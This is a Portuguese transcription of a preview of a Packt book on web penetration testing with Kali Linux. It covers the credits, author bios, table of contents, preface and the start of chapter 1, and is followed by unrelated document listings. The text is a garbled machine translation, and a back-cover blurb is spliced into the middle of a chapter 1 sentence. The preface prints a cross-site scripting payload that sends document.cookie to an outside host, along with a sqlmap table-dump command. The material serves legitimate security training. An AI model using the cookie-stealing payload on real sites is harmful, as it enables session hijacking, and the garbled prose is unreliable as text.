Teste de Invasão Web com Kali Linux

Save this PDF as:
 WORD  PNG  TXT  JPG

Tamanho: px
Começar a partir da página:

Download "Teste de Invasão Web com Kali Linux"

Transcrição

1

2 Teste de Invasão Web com Kali Linux Um guia prático para a implementação de testes de penetração estratégias em sites, aplicações web e padrão protocolos da web com Kali Linux. José Muniz Aamir Lakhani BIRMINGHAM - MUMBAI

3 Teste de Invasão Web com Kali Linux Copyright 2013 Packt Publishing Todos os direitos reservados. Nenhuma parte deste livro pode ser reproduzida, armazenada em um sistema, ou transmitida de qualquer forma ou por qualquer meio, sem a prévia e por escrito permissão do editor, exceto no caso de breves citações embutidas em artigos ou críticas. Todo esforço foi feito na preparação deste livro para garantir a precisão das informações apresentadas. No entanto, a informação contida neste livro é vendido sem garantia, expressa ou implícita. Nem os autores, nem Packt Publishing, e os seus revendedores e distribuidores serão responsáveis por quaisquer danos causados ou supostamente causados direta ou indiretamente por este livro. Packt Publishing tem se esforçado para fornecer informações sobre marca registrada de todos os empresas e produtos mencionados neste livro através da utilização adequada de capitais. No entanto, Packt Publishing não pode garantir a precisão das informações. Data de publicação: setembro 2013 Referência de Produção: Publicado por Packt Publishing Ltd. Livery Lugar 35 Livery Rua Birmingham B3 2PB, Reino Unido. ISBN Cubra Imagem por Karl Moore ukonline.co.uk) [FM-2]

4 Créditos Autores José Muniz Aamir Lakhani Revisores Adrian Hayter Danang Heriyadi Tajinder Singh Kalsi Brian Sak Kunal Sehgal Nitin.K. Sookun (ISH) Coordenador do Projeto Anugya Khurana Revisores Christopher Smith Clyde Jenkins Indexador Monica Ajmera Mehta Gráficos Ronak Dhruv Aquisição do Editor Vinay Argekar Coordenador de Produção Aditi Gajjar Editor Técnico chumbo Amey Varangaonkar Capa Trabalho Aditi Gajjar Editores Técnicos Pooja Arondekar Sampreshita Maheshwari Menza Mathew [FM-3]

5 Sobre os autores José Muniz é um arquiteto de soluções técnicas e de segurança pesquisador. Ele começou sua carreira em desenvolvimento de software e redes depois gerida como um contratado recurso técnico. Joseph mudou-se para consultoria e descobriu uma paixão por segurança durante a reunião com uma variedade de clientes. Ele esteve envolvido com o projeto e implementação de vários projetos que vão desde empresas Fortune 500 para grandes redes federais. Joseph é executado TheSecurityBlogger.com site, um dos recursos mais populares sobre segurança e implementação do produto. Você também pode encontrar Joseph falando em eventos ao vivo, bem como com outras publicações envolvido. Os acontecimentos recentes incluem alto-falante for Social Mídia Deception na conferência ASIS Internacional de 2013, alto-falante para Eliminar Rede pontos cegos com webinar Data Center Segurança, alto-falante para fazer Trazer Seu próprio dispositivo (BYOD) Trabalhar no Solutions Forum Governo, Washington DC, e um artigo sobre a comprometer senhas em PenTest Magazine - Backtrack Compêndio, julho de Fora do trabalho, ele pode ser encontrado por trás de toca-discos de vinil arranhando clássico ou no o campo de futebol mexer com os clubes locais. Este livro não poderia ter sido feito sem o apoio da minha encantadora esposa Ning e inspirações criativas da minha filha Raylin. Eu também deve creditar a minha paixão por aprender a meu irmão Alex, que me criou junto com meus pais amorosos Irene e Ray. E eu gostaria de dar um agradecimento final que a todos os meus amigos, familiares e colegas que me apoiaram ao longo dos anos. [FM-4]

6 Aamir Lakhani é uma das principais Cyber Security e Cyber Contra arquiteto. Ele é responsável pelo fornecimento de soluções de TI de segurança para grandes comercial e organizações empresariais federais. Lakhani lidera projetos que implementam posturas de segurança para empresas da Fortune 500, o Departamento de Defesa dos EUA, os principais provedores de saúde, instituições de ensino, e financeira e organizações de mídia. Lakhani projetou contra-ofensiva medidas de defesa para as agências de defesa e inteligência e organizações tem assistido em defender-se do ataque ativo de volta os ataques perpetrados por metro grupos cibernéticos. Lakhani é considerado um líder na indústria de apoio detalhado compromissos de arquitetura e projetos sobre tópicos relacionados à defesa cibernética, mobile ameaças de aplicação, malware e ameaças persistentes avançadas de pesquisa (APT), e Segurança das Trevas. Lakhani é o autor e colaborador de vários livros, e tem apareceu na National Public Radio como um especialista em Cyber Security. Escrevendo sob o pseudônimo de Dr. Chaos, Lakhani também opera o DrChaos.com blogue. Em sua lista recente de 46 federais Tecnologia Peritos para Siga no Twitter, a Forbes revista descreveu Aamir Lakhani como "um blogueiro, especialista infosec, super-herói... e todo bom homem. " Eu gostaria de dedicar este livro aos meus pais, e Mahmood Nasreen, e irmãs, e Noureen Zahra. Obrigado por sempre incentivando o pequeno hacker mim. Eu não poderia ter feito isso sem seu apoio. Obrigado mãe e pai por seus sacrifícios. Eu faria Também gosto também de agradecer aos meus amigos e colegas para o seu incontável encorajamento e orientação. Estou verdadeiramente abençoado para ser trabalhando com as pessoas mais inteligentes e mais dedicadas do mundo. [FM-5]

7 Sobre os Revisores Adrian Hayter é um testador de penetração com mais de 10 anos de experiência em e desenvolvimento quebrar em aplicações web. Ele possui um Mestrado licenciatura em Segurança da Informação e uma licenciatura Formado em Ciência da Computação pela Royal Holloway, Universidade de Londres. Danang Heriyadi é um pesquisador de segurança de computadores indonésia especializada em engenharia e software exploração reversa com mais de cinco anos mãos na experiência. Ele está atualmente trabalhando em Hatsecure como um instrutor para "Exploit avançada e Shellcode Desenvolvimento ". Como pesquisador, ele gosta de compartilhar o conhecimento de TI Segurança em seu blog em FuzzerByte (http://www.fuzzerbyte.com). Gostaria de agradecer aos meus pais por me dar vida, sem eles, eu não estaria aqui hoje, minha namorada para me apoiar cada dia com sorriso e amor, meus amigos, que eu não posso descrever um por um. [FM-6]

8 Tajinder Singh Kalsi é o co-fundador e Chief Technical Evangelist em Virscent Technologies Pvt. Ltd, com mais de seis anos de experiência de trabalho na área de TI. Ele começou sua carreira com WIPRO como Associate Técnico, e mais tarde tornou-se Consultor cum instrutor de TI. A partir de agora, ele realiza seminários em faculdades em todo Índia, sobre temas, tais como a segurança da informação, desenvolvimento de aplicações Android, computing desenvolvimento de sites, e nuvem, e cobriu mais de 100 faculdades e cerca de 8500 estudantes, mais até agora. Além de treinamento, ele também mantém um blog (www.virscent.com / blog), Que bate em vários truques de hackers. Pegá-lo no facebook em-www.facebook.com / tajinder.kalsi.tj ou seguir o seu sítiowww.tajinderkalsi.com. Gostaria especialmente de agradecer Krunal Rajawadha (Autor Executivo de Relacionamento na Packt Publishing) para vir através de mim através do meu blog e me oferecer esta oportunidade. Gostaria também de agradecer à minha família e amigos íntimos para me apoiar quando eu estava trabalhando neste projeto. Brian Sak, CCIE # 14441, é atualmente um Arquiteto de Soluções Técnico da Cisco Sistemas, onde ele está envolvido no desenvolvimento de soluções e ajuda os parceiros da Cisco construir e melhorar os seus serviços de consultoria. Antes da Cisco, Brian realizada segurança serviços de consultoria e avaliação para grandes instituições financeiras, governo dos EUA organismos e empresas da Fortune 500. Ele tem quase 20 anos de indústria experiência com a maioria dos que passaram em Segurança da Informação. Além de inúmeras certificações de segurança e da indústria técnicas, Brian tem um mestrado em Segurança da Informação e Assurance, e é um contribuinte para o Centro de Internet Security e outros livros e publicações com foco em segurança. [FM-7]

9 Kunal Sehgal (KunSeh.com) Entrou no setor de segurança de TI após a conclusão o curso de segurança do ciberespaço da faculdade da Geórgia (Canadá), e tem sido associado com organizações financeiras desde então. Isso não só lhe deu experiência em um lugar onde a segurança é crucial, mas também lhe forneceu valiosos conhecimentos especializados no campo. Atualmente, ele dirige está dirigindo as operações de TI de segurança, para a Região APAC de um dos maiores bancos europeus. No geral, ele tem cerca de 10 anos de experiência em diversas funções que vão desde a avaliação de vulnerabilidade, a governança de segurança e de avaliação de risco para monitoramento de segurança. Ele possui uma série de certificações para o seu nomear, incluindo própria OSCP do Backtrack, e outros, como TCNA, CISM, CCSK, Security +, roteador Cisco de Segurança, ISO LA, ITIL. Nitin Sookun (MBCS) é um nerd apaixonado que residem no coração de Oceano Índico, na bela ilha de Maurício. Ele começou sua carreira de computação como empresário e fundou Indra Co. Ltd. Na busca de mais um desafio, ele entregou a gestão do negócio sobre a sua família e se juntou Linkbynet indiano Oceano Ltd como Engenheiro de sistema Unix / Linux. Ele é atualmente um engenheiro da Laranja Serviços às empresas. Nitin tem sido um defensor opensuse desde 2009 e passa seu tempo livre evangelizando Linux e FOSS. Ele é um membro ativo de vários grupos de usuários e projetos de código aberto, entre elas opensuse Project, MATE Project Desktop, Fundação Software Livre, Linux User Group de Maurício, eo Maurício Artesanato de software comunitário. Ele gosta de scripting em Bash, Perl, e Python, e geralmente publica seu trabalho sobre seu blog. Seu mais recente trabalho "Projeto Evil Genius" é um roteiro adaptado para porta / install Ferramentas de Teste de Invasão em opensuse. Seus tutoriais são muitas vezes traduzidos para vários línguas e compartilhada dentro da comunidade open source. Nitin é um pensador livre e acredita em compartilhar conhecimento. Ele gosta de socializar com os profissionais de vários campos. [FM-8]

10 Arquivos de suporte, ebooks, ofertas de desconto e mais Você pode querer visitar para os arquivos de suporte e downloads relacionados ao seu livro. Você sabia que Packt oferece versões e-book de todos os livros publicados, com PDF e arquivos disponíveis epub? Você pode atualizar para a versão e-book em com e como um cliente livro impresso, você tem direito a um desconto na cópia ebook. Entre em contato com a gente no para mais detalhes. Em Você também pode ler uma coleção de artigos técnicos gratuitos, sinal -se para uma série de boletins informativos gratuitos e receber descontos exclusivos e ofertas em Packt livros e ebooks. TM Você precisa de soluções imediatas para suas perguntas de TI? PacktLib está online de Packt biblioteca de livros digitais. Aqui, você pode acessar, ler e pesquisar em toda Packt biblioteca de livros. Por que assinar? Totalmente pesquisável através de cada livro publicado pela Packt Copiar e colar, imprimir e conteúdo favorito On demand e acessível via navegador Acesso gratuito para os titulares de contas Packt Se você tiver uma conta com a Packt Você pode usar isso para o acesso PacktLib hoje e vista nove livros totalmente gratuitos. Basta usar suas credenciais de login para acesso imediato. [FM-9]

11

12 Índice analítico Prefácio Capítulo 1: Teste de Invasão e Configuração Conceitos de testes de penetração de aplicativos Web Metodologia Teste de Invasão Calculando risco Conceitos Kali Testes de Penetração Passo 1 - Reconhecimento Etapa 2 - Avaliação Alvo Passo 3 - Exploração Passo 4 - Privilege Escalation Passo 5 - a manutenção de um ponto de apoio Apresentando Kali Linux Configuração do sistema Kali Correndo Kali Linux a partir de uma mídia externa Instalando Kali Linux Kali Linux e VM imagem primeira corrida Visão geral ferramentas Kali Resumo Capítulo 2: Reconhecimento 33 Objetivos de reconhecimento A pesquisa inicial Site da empresa Fontes de história Web Registros Regionais da Internet (RIRs) Eletrônico coleta de dados, análise e recuperação (EDGAR) Recursos de mídia social Confiança

13 Índice analítico Postagens de emprego Localização Shodan Google hackers Google Hacking Banco de Dados Pesquisando redes HTTrack - clonar um site Técnicas de reconhecimento de ICMP Técnicas de reconhecimento DNS Identificação do alvo DNS Gráficos de coleta de informações - Maltego Nmap FOCA - site metadados Reconnaissance Resumo Ataques do lado do servidor: Capítulo 3 A avaliação da vulnerabilidade Webshag Skipfish ProxyStrike Vega OWASP-Zap Websploit Exploração Metasploit w3af Explorando os sistemas de Ataques de força bruta Hidra DirBuster WebSlayer Cracking senhas John the Ripper Man-in-the-middle Tira SSL Iniciando o ataque - redirecionamento Configurando o redirecionamento de porta usando o Iptables Resumo Ataques do lado do cliente: Capítulo 4 A engenharia social Engenharia Social Toolkit (SET) Usando SET para clonar e ataque [Ii]

14 Índice analítico MitM Proxy Hospedar digitalização Hospedar digitalização com Nessus Instalando o Nessus em Kali Usando o Nessus Obtenção e rachaduras senhas de usuários As senhas do Windows Montagem do Windows Senhas Linux Kali quebra de senha ferramentas Johnny hashcat e oclhashcat samdump2 chntpw Ophcrack Crunch Outras ferramentas disponíveis no Kali Hash-identificador dictstat RainbowCrack (rcracki_mt) findmyhash phrasendrescher CmosPwd creddump Resumo Autenticação Atacar: Capítulo 5 Atacar o gerenciamento de sessões Clickjacking Cookies de sessão Sequestro web Sessão de Ferramentas Web Plugins do Firefox Firesheep - Plugin do Firefox Web Developer - Plugin do Firefox Greasemonkey - Plugin do Firefox Biscoito Injector - Plugin do Firefox Os cookies Gestor + - Plugin do Firefox Biscoito Cadger Wireshark Hamster e Ferret Man-in-the-middle ataque dsniff e arpspoof [Iii]

15 Índice analítico Ettercap Emalhe SQL Injection SqlMap Cross-site scripting (XSS) Testando cross-site scripting Cookie de XSS roubo / sequestro Autenticação Outras ferramentas urlsnarf acccheck hexinject Patator DBPwAudit Resumo Capítulo 6: Ataques Web Exploração Navegador Quadro - Carne FoxyProxy - Plugin do Firefox BURP Proxy OWASP - ZAP Colheita senha SET Fimap Negação de Serviços (DoS) THC-SSL-DOS Scapy SlowLoris Low Orbit Ion Canhão Outras ferramentas DNSCHEF SniffJoke Cerco Inundator TCPReplay Resumo Capítulo 7: contramedidas defensivas 251 Testando suas defesas Segurança da linha de base STIG O gerenciamento de patches As diretivas de senha [Iv]

16 Índice analítico Espelhe o seu ambiente HTTrack Outras ferramentas de clonagem Man-in-the-middle defesa Defesa tira SSL Negação de Serviço defesa Defesa de Cookies Defesa Clickjacking Forense digital Kali Forensics Bota Análise do Sistema de Arquivos com Kali dc3dd Outras ferramentas forenses em Kali chkrootkit Autópsia Binwalk pdf-parser Principal Pasco Bisturi bulk_extractor Resumo Capítulo 8: Teste de Penetração Relatório Executivo Observância Os padrões da indústria Serviços profissionais Documentação Formato do relatório Capa Declaração de Confidencialidade Controle de documentos Timeline Resumo executivo Metodologia Procedimentos de teste detalhadas Resumo dos resultados Vulnerabilidades Considerações de rede e recomendações Apêndices Glossário [V]

17 Índice analítico Declaração de Trabalho (SOW) Teste de Invasão Externa Material adicional SOW Kali ferramentas de relatórios Dradis KeepNote Maltego CaseFile MagicTree CutyCapt Exemplos de relatórios Resumo Índice 313 [Vi]

18 Prefácio Kali é um arsenal Teste de Invasão baseado no Debian Linux usado por segurança profissionais (e outros) para realizar avaliações de segurança. Kali oferece uma variedade de conjuntos de ferramentas personalizadas para identificar e explorar vulnerabilidades em sistemas. Este livro é escrito ferramentas de alavancagem disponíveis em Kali Linux liberados 13 de março, 2013, bem como outras aplicações de código aberto. Teste de Invasão Web com Kali Linux é projetado para ser um guia para profissionais Testadores de penetração que procuram incluir Kali em uma penetração de aplicações web noivado. Nosso objetivo é identificar a melhor ferramenta de Kali (s) para uma tarefa específica, fornecer detalhes sobre como usar o aplicativo (s), e oferecem exemplos do que informações poderia ser obtida para fins de com base em experiência de campo especialista relatório. Kali tem vários programas e utilitários, no entanto, este livro vai concentrar-se na ferramenta mais forte (s) para uma tarefa específica no momento da publicação. Os capítulos deste livro são divididos em tarefas utilizados na aplicação web do mundo real Teste de Invasão. Capítulo 1, testes de penetração e de instalação, fornece uma visão geral Testes de Penetração conceitos básicos, estratégias de serviços profissionais, fundo sobre o meio ambiente Kali Linux, ea criação de Kali para temas apresentados neste livro. Capítulos 2-6, abrangem vários aplicativos web conceitos de testes de penetração, incluindo exemplos de configuração e relatórios destinados a destacar temas abordados se pode realizar seu objetivo desejado. Capítulo 7, contramedidas defensivas, serve como uma fonte de reparação em sistemas vulnerável a ataques apresentados nos capítulos anteriores. Capítulo 8, Teste de Penetração Relatório Executivo, oferece relatórios melhores práticas e exemplos que podem servir como modelos para a construção de relatórios de nível executivo. O objetivo de projetar o livro em desta forma é dar ao leitor um guia para envolver uma penetração de aplicações web com a ferramenta melhor possível (s) disponível em Kali, oferecer medidas para remediar uma vulnerabilidade e fornecer dados capturados como poderia ser apresentada de uma forma profissional.

19 Prefácio O que este livro cobre Capítulo 1, testes de penetração e de instalação, abrange os fundamentos da construção de uma prática profissional Teste de Invasão. Os tópicos incluem a diferenciação de um Teste de Penetração de outros serviços, descrição da metodologia e direcionamento aplicações web. Este capítulo também fornece passos utilizados para configurar uma Kali Ambiente Linux para tarefas abordados neste livro. Capítulo 2, Reconhecimento, fornece várias maneiras de coletar informações sobre um alvo. Os tópicos incluem ferramentas gratuitas populares destacando disponíveis na Internet como bem como a recolha de informação utilitários disponíveis em Kali Linux. Capítulo 3, os ataques lado do servidor, centra-se na identificação e exploração de vulnerabilidades em servidores web e aplicações. Ferramentas cobertos estão disponíveis em Kali ou outro aberto utilitários de origem. Capítulo 4, Ataques lado do cliente, alvos hospeda sistemas. Os tópicos incluem a engenharia social, explorando vulnerabilidades do sistema host e atacando as senhas, pois são os mais meio comum para proteger os sistemas host. Capítulo 5, Atacar de autenticação, analisa a forma como os usuários e dispositivos para autenticar web aplicações. Os tópicos incluem a segmentação do processo de gerenciamento de sessões de autenticação, comprometer a forma como os dados são armazenados em sistemas host, e man-in-the-middle ataque Capítulo 6, ataques na Web, explora como tirar proveito de servidores web e técnicas. Este capítulo também aborda brevemente em SQL e ataques Cross-Site Scripting. aplicações web que utilizam exploits de compromisso como a exploração de navegador, procuração ataques, e colheita de senha. Este capítulo abrange igualmente os métodos para interromper serviços utilizando técnicas de negação de serviço. Capítulo 7, contramedidas defensivas, fornece as melhores práticas para o seu endurecimento aplicações web e servidores. Os tópicos incluem linhas de base de segurança, gerenciamento de patches, políticas de senha, e defender-se contra os métodos de ataque abordados no anterior capítulos. Este capítulo também inclui uma seção forense focados, pois é importante para investigar adequadamente um ativo comprometido para evitar impacto negativo adicional. Capítulo 8, Penetração Teste Relatório Executivo, abrange as melhores práticas para o desenvolvimento de Penetração pós relatórios de serviço de teste profissionais. Os tópicos incluem uma visão geral de métodos para agregar valor ao seu produto final, a formatação do documento e os modelos que pode ser usado para construir relatórios profissionais. [2]

20 O que você precisa para este livro Prefácio Os leitores devem ter uma compreensão básica de aplicações web, networking conceitos e metodologia de testes de penetração. Este livro vai incluir detalhada exemplos de como executar um ataque usando ferramentas oferecidas em Kali Linux, bem como outras aplicações de código aberto. Não é necessário, mas benéfico ter experiência usando versões anteriores do Backtrack ou programas similares. Os requisitos de hardware para a construção de um ambiente de laboratório e criação da Kali Arsenal Linux são abordados em Capítulo 1, testes de penetração e de Instalação. Que este livro é para O público-alvo deste livro são testadores de penetração profissionais ou outros olhando para maximizar Kali Linux para um Teste de Invasão do servidor web ou aplicação exercício. Se você está procurando identificar como realizar um teste de penetração contra aplicações web e achados a um cliente é uma forma profissional, em seguida, este livro é para você. Convenções Neste livro, você vai encontrar uma série de estilos de texto que distinguem entre diferentes tipos de informação. Aqui estão alguns exemplos desses estilos, e um explicação do seu significado. Palavras de código no texto são apresentados da seguinte forma: "Por exemplo, você pode ligar para o perfil My First Scan ou qualquer outra coisa que você gostaria. " Um bloco de código é definido da seguinte forma: <script> document.write ("<img src = 'http://kali.drchaos.com/var/www/xss_ laboratório / lab_script.php? "+ document.cookie +"> ") </ script> Qualquer entrada de linha de comando ou a saída é escrita da seguinte forma: SqlMap-u teste - despejo -T-L tablesnamehere -U teste-dump [3]

21 Prefácio Novos termos e palavras importantes são mostradas em negrito. As palavras que você vê na tela, em menus ou caixas de diálogo, por exemplo, aparecem no texto assim: "Em breve como nós, clique no Executar botão, nós recebemos uma injeção de SQL ". Avisos ou notas importantes aparecem em uma caixa como esta. Dicas e truques aparecer assim. Feedback do leitor O feedback dos nossos leitores é sempre bem-vindo. Deixe-nos saber o que você pensa Neste livro, o que você gostou ou não gostou pode ter. Feedback do leitor é importante para o nos a desenvolver títulos que você realmente tirar o máximo proveito de. Para nos enviar feedback geral, basta enviar um para e mencionar o título do livro através do assunto da mensagem. Se existe um tema que você tem experiência em e você está interessado em qualquer escrita ou contribuir para um livro, consulte o nosso guia autor em / autores. Atendimento ao Cliente Agora que você é o orgulhoso proprietário de um livro Packt, temos uma série de coisas para ajudá-lo a obter o máximo de sua compra. Errata Embora tenhamos tomado todos os cuidados para garantir a exatidão dos nossos conteúdos, erros acontecem. Se você encontrar um erro em um dos nossos livros, talvez um erro no texto ou o código-ficaríamos muito gratos se você iria relatar isso para nós. Ao fazer isso, você pode salvar outros leitores de frustração e nos ajudar a melhorar as versões subseqüentes deste livro. Se você encontrar qualquer errata, por favor informe-los visitando com.br / submeter-errata, A seleção de seu livro, clicando no formulário de apresentação de errata link, e inserir os detalhes da sua errata. Uma vez que seu errata são verificados, a sua submissão Serão aceitos ea errata será carregado no nosso site, ou adicionado a qualquer lista de errata existente, sob a seção Errata desse título. Qualquer errata existente pode ser visto seleccionando o seu título de [4]

22 Pirataria Prefácio A pirataria de material com direitos autorais na internet é um problema constante em todas as mídias. No Packt, tomamos a proteção de nossos direitos autorais e licenças muito a sério. Se você deparar com as cópias ilegais de nossos trabalhos, sob qualquer forma, na internet, por favor nos fornecer o endereço de localização ou nome do site imediatamente para que possamos buscar um remédio. Entre em contato conosco com um link para a suspeita material pirateado. Agradecemos a sua ajuda na proteção de nossos autores, e nossa capacidade de trazer você um conteúdo valioso. Perguntas Você pode contatar-nos em se você está tendo um problema com qualquer aspecto do livro, e nós faremos o nosso melhor para resolvê-lo. [5]

23

24 Teste de Invasão e Configuração Muitas organizações oferecem serviços de segurança e de uso de termos tais como auditoria de segurança, rede ou avaliação de risco, e Penetration Test com significados sobrepostos. Por definição, uma auditoria é uma avaliação técnica mensurável de um sistema (s) ou aplicativo (s). As avaliações de segurança são as avaliações de risco, ou seja, os serviços usado para identificar vulnerabilidades em sistemas, aplicações e processos. Teste de Invasão vai além de uma avaliação através da avaliação identificado vulnerabilidades para verificar se a vulnerabilidade é real ou um falso positivo. Por exemplo, uma auditoria ou uma avaliação pode utilizar ferramentas de verificação que fornecem algumas centenas possíveis vulnerabilidades em vários sistemas. Um teste de penetração tentaria para atacar essas vulnerabilidades da mesma maneira como um hacker malicioso para verificar quais vulnerabilidades são genuínos reduzir a lista verdadeira das vulnerabilidades do sistema para um punhado de falhas de segurança. Os Testes de Penetração mais eficazes são os que que visam um sistema muito específico, com um objetivo muito específico. Qualidade sobre a quantidade é o verdadeiro teste de um teste de penetração bem-sucedida. Enumerando um único sistema durante um ataque direcionado revela mais sobre a segurança do sistema e tempo de resposta para lidar com incidentes que ataque amplo espectro. Escolhendo cuidadosamente alvos valiosos, uma Verificador da penetração pode determinar toda a infra-estrutura de segurança e associado risco de um ativo valioso. O Teste de Invasão não tornar as redes mais seguras!

25 Teste de Invasão e Configuração Esta é uma má interpretação comum e deve ser claramente explicado a todos os potenciais clientes. Teste de Invasão avalia a eficácia da segurança existente. Se um cliente não tem uma forte segurança, em seguida, eles vão receber pouco valor a partir de Serviços de testes de penetração. Como consultor, recomenda-se que a penetração Os serviços de análise são oferecidos como forma de verificar a segurança para os sistemas existentes, uma vez um cliente acredita que eles tenham esgotado todos os esforços para assegurar a esses sistemas e são pronto para avaliar se existem lacunas existentes na obtenção desses sistemas. Posicionando um escopo adequado de trabalho é fundamental quando a venda de serviços de testes de penetração. O escopo do trabalho define o que os sistemas e as aplicações estão a ser alvo, bem como o que conjuntos de ferramentas podem ser usadas para comprometer vulnerabilidades que são encontradas. Melhores práticas está a trabalhar com o seu cliente durante uma sessão de design para desenvolver um escopo aceitável de Teste trabalho de Invasão que não Web tem com impacto Kali Linux-o sobre o próxima valor dos geração resultados. de BackTrack-se uma hands-on guia que irá fornecer-lhe passo-a-passo métodos para encontrar vulnerabilidades e exploração de aplicações web. Este livro vai cobrir alvos pesquisando, identificando e exploração de vulnerabilidades em aplicações web, bem como os clientes que usam web serviços de aplicação, defendendo aplicações web contra ataques comuns, e edifício Teste de Invasão os produtos para a prática de serviços profissionais. Nós acredito que este livro é ótimo para quem está interessado em aprender como se tornar um Verificador da penetração, os usuários que são novos para Kali Linux e querem aprender as características e as diferenças de Kali contra BackTrack, e testadores de penetração experientes que podem precisa de uma reciclagem ou de referência sobre novas ferramentas e técnicas. Este capítulo vai quebrar os conceitos fundamentais por trás vários segurança serviços, bem como orientações para a construção de uma prática profissional Teste de Invasão. Conceitos incluem diferenciar um teste de penetração de outros serviços, a metodologia visão geral, e visando aplicações web. Este capítulo também fornece uma breve visão geral da criação de um teste de Kali Linux ou ambiente real. Teste de Invasão aplicação Web conceitos A aplicação web é qualquer aplicativo que usa um navegador web como um cliente. Esta lata ser um fórum de mensagens simples ou uma folha de cálculo muito complexo. As aplicações web são popular baseado na facilidade de acesso a serviços e gerenciamento centralizado de um sistema utilizado por vários partidos. Requisitos para acessar um aplicativo web pode seguir padrões de cliente navegador indústria simplificar as expectativas, tanto do prestadores de serviços, bem como os anfitriões acessar o aplicativo. [8]

PARA MAC. Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento

PARA MAC. Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento PARA MAC Guia de Inicialização Rápida Clique aqui para fazer o download da versão mais recente deste documento ESET Cyber Security fornece proteção de última geração para seu computador contra código mal-intencionado.

Leia mais

ESET NOD32 Antivirus 4 para Linux Desktop. Guia de Inicialização Rápida

ESET NOD32 Antivirus 4 para Linux Desktop. Guia de Inicialização Rápida ESET NOD32 Antivirus 4 para Linux Desktop Guia de Inicialização Rápida O ESET NOD32 Antivirus 4 fornece proteção de última geração para o seu computador contra código malicioso. Com base no mecanismo de

Leia mais

ESET CYBER SECURITY PRO para Mac Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento

ESET CYBER SECURITY PRO para Mac Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento ESET CYBER SECURITY PRO para Mac Guia de Inicialização Rápida Clique aqui para fazer o download da versão mais recente deste documento ESET Cyber Security Pro fornece proteção de última geração para seu

Leia mais

ESET NOD32 ANTIVIRUS 6

ESET NOD32 ANTIVIRUS 6 ESET NOD32 ANTIVIRUS 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Guia de Inicialização Rápida Clique aqui para fazer download da versão mais recente deste documento O ESET NOD32 Antivirus fornece

Leia mais

para Mac Guia de Inicialização Rápida

para Mac Guia de Inicialização Rápida para Mac Guia de Inicialização Rápida O ESET Cybersecurity fornece proteção de última geração para o seu computador contra código malicioso. Com base no ThreatSense, o primeiro mecanismo de verificação

Leia mais

Qlik Sense Cloud. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados.

Qlik Sense Cloud. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Qlik Sense Cloud Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Qlik, QlikTech,

Leia mais

ESET NOD32 ANTIVIRUS 8

ESET NOD32 ANTIVIRUS 8 ESET NOD32 ANTIVIRUS 8 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guia de Inicialização Rápida Clique aqui para fazer download da versão mais recente deste documento

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,

Leia mais

Guia de Usuário do Gateway do Avigilon Control Center. Versão 5.6

Guia de Usuário do Gateway do Avigilon Control Center. Versão 5.6 Guia de Usuário do Gateway do Avigilon Control Center Versão 5.6 2006-2015 Avigilon Corporation. Todos os direitos reservados. A menos que seja expressamente concedida por escrito, nenhuma licença será

Leia mais

HP Mobile Printing para Pocket PC

HP Mobile Printing para Pocket PC HP Mobile Printing para Pocket PC Guia de Iniciação Rápida O HP Mobile Printing para Pocket PC permite imprimir mensagens de e-mail, anexos e arquivos em uma impressora Bluetooth, de infravermelho ou de

Leia mais

ESET NOD32 ANTIVIRUS 9

ESET NOD32 ANTIVIRUS 9 ESET NOD32 ANTIVIRUS 9 Microsoft Windows 10 / 8.1 / 8 / 7 / Vista / XP Guia de Inicialização Rápida Clique aqui para fazer download da versão mais recente deste documento O ESET NOD32 Antivirus fornece

Leia mais

Boas Práticas de Desenvolvimento Seguro

Boas Práticas de Desenvolvimento Seguro Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO

Leia mais

Metodologias pentest. Prof. Nataniel Vieira nataniel.vieira@gmail.com

Metodologias pentest. Prof. Nataniel Vieira nataniel.vieira@gmail.com Metodologias pentest Prof. Nataniel Vieira nataniel.vieira@gmail.com Sumário Metodologias Abordagens existentes Fases de um pentest Principais técnicas Principais ferramentas Aplicações alvo 2 Hacking

Leia mais

Sobre Nós. NossaVisão

Sobre Nós. NossaVisão 2015 Sobre Nós 1 ArtsSec foi fundada por um grupo de profissionais dedicados à segurança da informação a fim de proporcionar soluções criativas e de alto valor aos seus clientes. A empresa surgiu em 2012,

Leia mais

Que informações nós coletamos, e de que maneira?

Que informações nós coletamos, e de que maneira? Política de Privacidade Vivertz Esta é a política de privacidade da Affinion International Serviços de Fidelidade e Corretora de Seguros Ltda que dispõe as práticas de proteção à privacidade do serviço

Leia mais

FERRAMENTAS DE COLABORAÇÃO CORPORATIVA

FERRAMENTAS DE COLABORAÇÃO CORPORATIVA FERRAMENTAS DE COLABORAÇÃO CORPORATIVA Manual de Utilização Google Grupos Sumário (Clique sobre a opção desejada para ir direto à página correspondente) Utilização do Google Grupos Introdução... 3 Página

Leia mais

Aula 12 Lista de verificação de segurança para o Windows 7

Aula 12 Lista de verificação de segurança para o Windows 7 Aula 12 Lista de verificação de segurança para o Windows 7 Use esta lista de verificação para ter certeza de que você está aproveitando todas as formas oferecidas pelo Windows para ajudar a manter o seu

Leia mais

Novell Teaming 2.0. Novell. 29 de julho de 2009. Início Rápido. Iniciando o Novell Teaming. Conhecendo a interface do Novell Teaming e seus recursos

Novell Teaming 2.0. Novell. 29 de julho de 2009. Início Rápido. Iniciando o Novell Teaming. Conhecendo a interface do Novell Teaming e seus recursos Novell Teaming 2.0 29 de julho de 2009 Novell Início Rápido Quando você começa a usar o Novell Teaming, a primeira coisa a se fazer é configurar sua área de trabalho pessoal e criar uma área de trabalho

Leia mais

